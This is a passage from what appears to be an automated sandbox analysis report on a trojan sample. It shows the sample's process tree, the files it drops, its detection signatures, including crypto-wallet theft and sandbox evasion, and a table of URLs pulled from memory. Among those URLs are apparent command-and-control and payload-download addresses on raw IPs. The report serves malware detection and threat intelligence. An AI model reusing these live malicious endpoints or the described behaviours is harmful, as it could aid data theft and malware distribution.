C:\Users\...\xPkU0vAnxq9kCf406fqJmxI3.exe, PE32 19->78 dropped 80 330 other malicious files 19->80 dropped 144 Drops script or batch files to the startup folder 19->144 146 Creates HTML files with .exe extension (expired dropper behavior) 19->146 148 Writes many files with high entropy 19->148 29 7g1UcaWDIadEWTPuXfBgjhjE.exe 19->29         started        32 fwUkFVOLVOFs3NY104r7giRJ.exe 19->32         started        34 MX6OxFuxXLJNkbD9F2dPLyyC.exe 19->34         started        41 16 other processes 19->41 37 conhost.exe 23->37         started        39 WmiPrvSE.exe 23->39         started        signatures9 process10 file11 102 C:\Users\user\AppData\Local\...\syncUpd.exe, PE32 29->102 dropped 104 C:\Users\user\AppData\Local\...\INetC.dll, PE32 29->104 dropped 106 C:\Users\user\AppData\...\BroomSetup.exe, PE32 29->106 dropped 43 syncUpd.exe 29->43         started        47 BroomSetup.exe 29->47         started        108 C:\Users\...\fwUkFVOLVOFs3NY104r7giRJ.tmp, PE32 32->108 dropped 49 fwUkFVOLVOFs3NY104r7giRJ.tmp 32->49         started        116 4 other malicious files 34->116 dropped 134 Writes many files with high entropy 34->134 51 MX6OxFuxXLJNkbD9F2dPLyyC.exe 34->51         started        53 MX6OxFuxXLJNkbD9F2dPLyyC.exe 34->53         started        110 C:\Users\...\mlSjlt4YcfcpuVp4aQsoCouK.tmp, PE32 41->110 dropped 112 C:\Users\...\DAOYzG6VUKOTbMmRBP4iG9FF.tmp, PE32 41->112 dropped 114 C:\Users\...\uOoBNdE6Sm5DmPd13osCbhQm.tmp, PE32 41->114 dropped 118 9 other malicious files 41->118 dropped 136 Detected unpacking (changes PE section rights) 41->136 138 Detected unpacking (overwrites its own PE header) 41->138 140 Found Tor onion address 41->140 142 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 41->142 55 DAOYzG6VUKOTbMmRBP4iG9FF.tmp 41->55         started        57 FnzHBAPEbvEEx8ZWWEvo0R6a.tmp 41->57         started        59 51fuIpAxuIxVSFNlFyLCdDUf.exe 41->59         started        61 8aNg0kr81H7icHssfXxzSpJA.exe 41->61         started        signatures12 process13 file14 94 12 other files (8 malicious) 43->94 dropped 158 Detected unpacking (changes PE section rights) 43->158 160 Detected unpacking (overwrites its own PE header) 43->160 162 Found many strings related to Crypto-Wallets (likely being stolen) 43->162 164 6 other signatures 43->164 63 cmd.exe 47->63         started        84 C:\Users\user\AppData\...\weblinkanalyzer.exe, PE32 49->84 dropped 96 16 other files (15 malicious) 49->96 dropped 65 weblinkanalyzer.exe 49->65         started        68 weblinkanalyzer.exe 49->68         started        86 Opera_installer_2403121027455829404.dll, PE32 51->86 dropped 88 Opera_installer_24031210274997611284.dll, PE32 53->88 dropped 98 3 other files (2 malicious) 55->98 dropped 100 3 other files (2 malicious) 57->100 dropped 90 Opera_installer_24031210275393811096.dll, PE32 59->90 dropped 92 Opera_installer_24031210280932613620.dll, PE32 61->92 dropped signatures15 process16 file17 70 conhost.exe 63->70         started        72 C:\...\DirectSoundDriver 2.36.198.67.exe, PE32 65->72 dropped process18

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe18%ReversingLabsByteCode-MSIL.Trojan.Zilla

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe100%AviraHEUR/AGEN.1315065
                        C:\Users\user\AppData\Local\6mUOGmYOgu78GIQPbKV3WDdm.exe100%Joe Sandbox ML
                        C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.172.128.145/3cd2b41cbde8fc9c.phptrue

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://195.16.74.230/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1weblinkanalyzer.exe, 00000015.00000002.3176344487.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                            https://legal.opera.com/termsMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DCA000.00000040.00000001.01000000.0000001F.sdmpfalse
                              https://namecloudvideo.orgInstallUtil.exe, 00000008.00000002.3203681582.00000000032AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003386000.00000004.00000800.00020000.00000000.sdmpfalse
                                http://185.172.128.145/15f649199f40275b/freebl3.dllsyncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                  http://15.204.49.148/files/Silent.d#InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://help.opera.com/latest/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                      https://download3.operacdn.com/SMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        https://policies.google.com/terms;MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpfalse
                                          https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3288684476.0000000035533000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3263332828.000000003548C000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2613936298.000000005DF34000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2903459816.000000005DE8C000.00000004.00001000.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2924292015.000000005DEE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            https://download.opera.com/nMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612770166.0000000001445000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612740729.000000000143F000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000143F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              http://185.172.128.187/ping.php?substr=sevenu7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software7MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.00000000013B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://yip.su/redirect-InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    http://localhost:3001api/prefs/?product=$1&version=$2..MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                      https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                        https://download.opera.com/d51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2875499690.000000005DE2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          https://www.opera.com/download/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                            https://download.opera.com/fMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612770166.0000000001445000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612740729.000000000143F000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000143F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              http://midnight.bestsuDInstallUtil.exe, 00000008.00000002.3203681582.000000000372A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000002.00000003.1744726219.000002557D4FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744726219.000002557D40E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://15.204.49.148/files/Silent.0BInstallUtil.exe, 00000008.00000002.3203681582.000000000355A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    https://download3.operacdn.com/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.0000000001368000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      https://download.opera.com/I51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2631627335.0000000000C1B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        http://185.172.128.145/15f649199f40275b/mozglue.dllsyncUpd.exe, 00000011.00000002.3182663739.0000000000772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          https://turnitin.com/robot/crawlerinfo.html)cannot23jzBT2gZ2W4aFsNb8WtTEfu.exe, 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                            http://185.172.128.90/cpa/ping.php?substr=seven&s=ab7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2197262052.0000000002DFA000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000003.2105647345.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 7g1UcaWDIadEWTPuXfBgjhjE.exe, 0000000F.00000002.2138989621.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000002.3183903851.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, 0rb7lvvnt87bG7IAtAszCDpT.exe, 00000012.00000002.3181621791.000000000096E000.00000004.00000020.00020000.00000000.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000002.3181533665.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, trvViErxBCFce9vUUZnny6xg.exe, 00000017.00000002.3194499183.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000002.3184023789.0000000002CE7000.00000004.00000020.00020000.00000000.sdmp, 363PwSZXj46RramHioCvzZ7q.exe, 00000019.00000002.3181428356.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3181834392.000000000084E000.00000004.00000020.00020000.00000000.sdmp, aKsTqJOcX9LAZThGesUnxmZk.exe, 0000001B.00000002.3184608774.0000000002D55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000002.00000003.1744726219.000002557D4C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://download.opera.com/C51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2581876700.00000000044F8000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2854158568.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2528084518.00000000044F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    https://iplogger.org/privacy/InstallUtil.exe, 00000008.00000002.3203681582.0000000003268000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000362B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000352C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003799000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003221000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000037A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000357B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003254000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000325C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000329E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003382000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003786000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003376000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000036E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      http://www.innosetup.com/fwUkFVOLVOFs3NY104r7giRJ.tmp, fwUkFVOLVOFs3NY104r7giRJ.tmp, 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053165938.0000000002360000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000003.2053429105.0000000002138000.00000004.00001000.00020000.00000000.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.tmp, 00000016.00000000.2084798987.0000000000401000.00000020.00000001.01000000.00000017.sdmpfalse
                                                                                        https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=15HMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3263332828.000000003548C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          https://crashpad.chromium.org/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                            https://addons.opera.com/en/extensions/details/dify-cashback/51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                              https://autoupdate.geo.opera.com/geolocation/MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                https://autoupdate.geo.opera.com/NSMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000140B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  https://crashstats-collector.opera.com/collector/submitMX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3152395662.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3211196755.0000000054654000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3203950091.0000000054614000.00000004.00001000.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3162939013.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000003.2213913866.000000005DE38000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    http://yip.suInstallUtil.exe, 00000008.00000002.3203681582.000000000361D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.0000000003597000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.000000000375B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3203681582.00000000033AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://download3.operacdn.com//MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3191695423.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2623821375.000000000143C000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612370535.000000000144E000.00000004.00000020.00020000.00000000.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000003.2612712820.000000000144E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineInstallUtil.exe, 00000008.00000002.3203681582.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, fwUkFVOLVOFs3NY104r7giRJ.exe, fwUkFVOLVOFs3NY104r7giRJ.exe, 0000000C.00000000.1978118196.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, DAOYzG6VUKOTbMmRBP4iG9FF.exe, 00000013.00000000.2047880300.0000000000401000.00000020.00000001.01000000.00000015.sdmpfalse
                                                                                                          http://crl.ver)svchost.exe, 00000002.00000002.3208903344.000002557D600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            https://net.geo.operInstallUtil.exe, 00000008.00000002.3203681582.00000000036A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://opera.com/privacyMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
                                                                                                                http://185.172.128.145/15f649199f40275b/vcruntime140.dll1syncUpd.exe, 00000011.00000002.3283292607.0000000026EC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://gamemaker.io)MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.000000000084A000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.000000000084A000.00000040.00000001.01000000.00000019.sdmpfalse
                                                                                                                    http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/FetchingMX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3310492236.000000006BF07000.00000002.00000001.01000000.0000001B.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 00000018.00000002.3151197232.0000000000875000.00000040.00000001.01000000.00000019.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3231717567.000000006B7B7000.00000002.00000001.01000000.0000001E.sdmp, MX6OxFuxXLJNkbD9F2dPLyyC.exe, 0000001A.00000002.3173781304.0000000000875000.00000040.00000001.01000000.00000019.sdmp, 51fuIpAxuIxVSFNlFyLCdDUf.exe, 0000001C.00000002.2632368764.0000000000DF5000.00000040.00000001.01000000.0000001F.sdmpfalse
